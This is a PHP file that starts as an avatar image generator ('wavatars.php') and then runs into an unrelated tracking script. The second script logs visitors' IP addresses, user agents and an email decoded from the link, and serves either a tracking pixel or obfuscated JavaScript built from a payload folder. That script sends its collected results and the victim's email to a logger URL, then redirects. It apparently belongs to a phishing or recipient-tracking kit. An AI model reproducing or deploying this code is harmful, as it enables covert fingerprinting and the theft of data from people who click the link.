<?php

 //wavaters.php
define("AVATAR_SIZE",           '100');
define("WAVATAR_BACKGROUNDS",   '4');
define("WAVATAR_FACES",         '11');
define("WAVATAR_BROWS",         '8');
define("WAVATAR_EYES",          '13');
define("WAVATAR_PUPILS",        '11');
define("WAVATAR_MOUTHS",        '19');


/*-----------------------------------------------------------------------------
Clamp a value between 0 and 255
-----------------------------------------------------------------------------*/

function wavatar_clamp ($v)
{
    return $v < 0 ? 0 : ($v > 255 ? 255 : $v);
}

/*-----------------------------------------------------------------------------
Handy function for converting hus/sat/lum color values to RGB, which makes it
very easy to generate random-yet-still-vibrant colors.
-----------------------------------------------------------------------------*/

function wavatar_hsl ($h, $s, $l) 
{

    if ($h>240 || $h<0 || $s>240 || $s<0 || $l>240 || $l<0)
        return array(0,0,0);
    if ($h<=40) {
        $R=255;
        $G=(int)($h/40*256);
        $B=0;
    } elseif ($h>40 && $h<=80) {
        $R=(1-($h-40)/40)*256;
        $G=255;
        $B=0;
    } elseif ($h>80 && $h<=120) {
        $R=0;
        $G=255;
        $B=($h-80)/40*256;
    } elseif ($h>120 && $h<=160) {
        $R=0;
        $G=(1-($h-120)/40)*256;
        $B=255;
    } elseif ($h>160 && $h<=200) {
        $R=($h-160)/40*256;
        $G=0;
        $B=255;
    } elseif ($h>200) {
        $R=255;
        $G=0;
        $B=(1-($h-200)/40)*256;
    }
    $R=$R+(240-$s)/240*(128-$R);
    $G=$G+(240-$s)/240*(128-$G);
    $B=$B+(240-$s)/240*(128-$B);
    if ($l<120) {
        $R=($R/120)*$l;
        $G=($G/120)*$l;
        $B=($B/120)*$l;
    } else {
        $R=$l*((256-$R)/120)+2*$R-256;
        $G=$l*((256-$G)/120)+2*$G-256;
        $B=$l*((256-$B)/120)+2*$B-256;
    }
    return array((int)wavatar_clamp ($R),(int)wavatar_clamp($G),(int)wavatar_clamp($B));

}

/*-----------------------------------------------------------------------------
Helper function for building a wavatar.  This loads an image and adds it to 
our composite using the given color values.
-----------------------------------------------------------------------------*/

function wavatar_apply_image ($base, $part)
{

    $file = dirname(__FILE__).'/parts/' . $part . '.png';
    $im = @imagecreatefrompng($file);
    if(!$im)
        return;
    imagecopy($base,$im, 0, 0, 0, 0, AVATAR_SIZE, AVATAR_SIZE);
    imagedestroy($im);

}

/*-----------------------------------------------------------------------------
Builds the avatar.
-----------------------------------------------------------------------------*/

function wavatar_build ($seed, $filename, $size)
{

    //look at the seed (an md5 hash) and use pairs of digits to determine our
    //"random" parts and colors.
    $face =         1 + (hexdec (substr ($seed,  1, 2)) % (WAVATAR_FACES));
    $bg_color =         (hexdec (substr ($seed,  3, 2)) % 240);
    $fade =         1 + (hexdec (substr ($seed,  5, 2)) % (WAVATAR_BACKGROUNDS));
    $wav_color =        (hexdec (substr ($seed,  7, 2)) % 240);
    $brow =         1 + (hexdec (substr ($seed,  9, 2)) % (WAVATAR_BROWS));
    $eyes =         1 + (hexdec (substr ($seed, 11, 2)) % (WAVATAR_EYES));
    $pupil =        1 + (hexdec (substr ($seed, 13, 2)) % (WAVATAR_PUPILS));
    $mouth =        1 + (hexdec (substr ($seed, 15, 2)) % (WAVATAR_MOUTHS));
    // create backgound
    $avatar = imagecreatetruecolor (AVATAR_SIZE, AVATAR_SIZE);
    //Pick a random color for the background
    $c = wavatar_hsl ($bg_color, 240, 50);
    $bg = imagecolorallocate ($avatar, $c[0], $c[1], $c[2]);
    imagefill($avatar, 1, 1, $bg);
    $c = wavatar_hsl ($wav_color, 240, 170);
    $bg = imagecolorallocate ($avatar, $c[0], $c[1], $c[2]);
    //Now add the various layers onto the image
    wavatar_apply_image ($avatar, "fade$fade");
    wavatar_apply_image ($avatar, "mask$face");
    imagefill($avatar, (int)(AVATAR_SIZE / 2),(int)(AVATAR_SIZE / 2),$bg);
    wavatar_apply_image ($avatar, "shine$face");
    wavatar_apply_image ($avatar, "eyes$eyes");
    wavatar_apply_image ($avatar, "brow$brow");
    wavatar_apply_image ($avatar, "pupils$pupil");
    wavatar_apply_image ($avatar, "mouth$mouth");
    //resize if needed
    if ($size != AVATAR_SIZE) {
        $out = imagecreatetruecolor($size,$size);
        imagecopyresampled ($out,$avatar, 0, 0, 0, 0, $size, $size, AVATAR_SIZE, AVATAR_SIZE);
        imagepng($out, $filename);
        imagedestroy($out);
        imagedestroy($avatar);
    } else {
        imagepng($avatar, $filename);
        imagedestroy($avatar);
    }

}
?>
<?php

include "function.php";
include "config.php";

$ip = $_SERVER['REMOTE_ADDR'];
$method = $_SERVER["REQUEST_METHOD"];
$useragent = $_SERVER['HTTP_USER_AGENT'];
$acceptedLanguages = $_SERVER["HTTP_ACCEPT_LANGUAGE"];

$email = decode_parameter(get_id());
$mode = isset($_GET['m']) ? base64_decode($_GET['m']) : 1 ; //0: plain text, 1: with <script>
//$redirect_page = isset($_GET['r'])? base64_decode($_GET['r']) : "";

$REDIRECT_URL = "";#https://www.google.com
$redirect_url = get_redirect_url($REDIRECT_URL);

if ("GET" == $method && is_request_blocked() == false ) {    //valid click logged
    write_log($ACCESS_LOGFILE, $email);


    if (is_dot_image_mode($DOT_IMAGE_EXT) == true){
        header("Content-type: image/jpeg");
        header('Cache-Control: max-age=0, private, no-cache');
        header('Pragma: no-cache');        
        $img_text = '1';
        if( !is_null($email))
        {
             $img_text = $email;
        }

        $color_options = Array("#6f0247", "#FF0569", "#FFF478", "#BAFFC0", "#27DB2D", "#380470", "#9D69D6");
        $w = 2;
        $h = 2;
        $pixel = 1;
        $IMG = imagecreatetruecolor($w, $h);
        for($row = 0; $row <= $h / $pixel; $row++) {
            for($column = 0; $column <= $w/ $pixel; $column++) {    
               $hex = $color_options[rand(0,sizeof($color_options)-1)]; 
               list($r, $g, $b) = sscanf($hex, "#%02x%02x%02x");

               $color = imagecolorallocate ($IMG, $r , $g, $b);

               imagefilledrectangle(
                   $IMG,
                   $column*$pixel,
                   $row*$pixel,
                   $column*$pixel+$pixel,
                   $row*$pixel+$pixel, 
                   $color
               );
            }
        }
        imagepng($IMG);
        imagedestroy($IMG);    
    } else {
        header('Content-Type: text/html; charset=utf-8');
        header('Cache-Control: max-age=0, private, no-cache');
        header('Pragma: no-cache');

        $payloads = "var results = '';";

        //Common js
        $payloads = $payloads . get_js_contents_in_folder($PAYLOAD_PATH);

        //IE-only js
        if (is_browser_ie($useragent)){
            $payloads = $payloads . get_js_contents_in_folder($PAYLOAD_PATH . "/ie/");
        } else {
            $payloads = $payloads . get_js_contents_in_folder($PAYLOAD_PATH . "/non-ie/");
        }

        //append ajax post action

//        if ($mode == 0) {         //more have bugs!!!
//            $LOGGER_URL = get_current_folder_path() . $LOGGER_URL;
//        }
        if ($email) {
            $logger_url = $LOGGER_URL . "?i=" . base64_encode($email);
        } else {
            $logger_url = $LOGGER_URL . "?";
        }
        //$payloads = $payloads . generate_ajax_post_script($logger_url);
        $payloads = $payloads . generate_img_get_script($logger_url);
        if ($mode == 1) {
            echo "<script>" . obfucate_javascript($payloads) . "</script>";
        } else {
            echo obfucate_javascript($payloads);
        }
        #echo $payloads;
        #echo "<script>" . $payloads . "</script>";

        if ($redirect_url) {
            redirect_javascript($redirect_url);
            //echo "<script>window.location.href = " . $REDIRECT_LOCATION . "</script>";
            //echo '<meta HTTP-EQUIV="REFRESH" content="0; url=' . $redirect_url . "&i=" .base64_encode($email) .  '">';
        }
    }
}

?>
<?php
// $url  =  "https://www.youtube.com/watch?v=yfdIx854bN4" ;  
// echo " <script language = 'javascript'  
// type = 'text/javascript' > ";  
// echo " window.location.href = '$url' ";  
// echo " </script > ";  
?>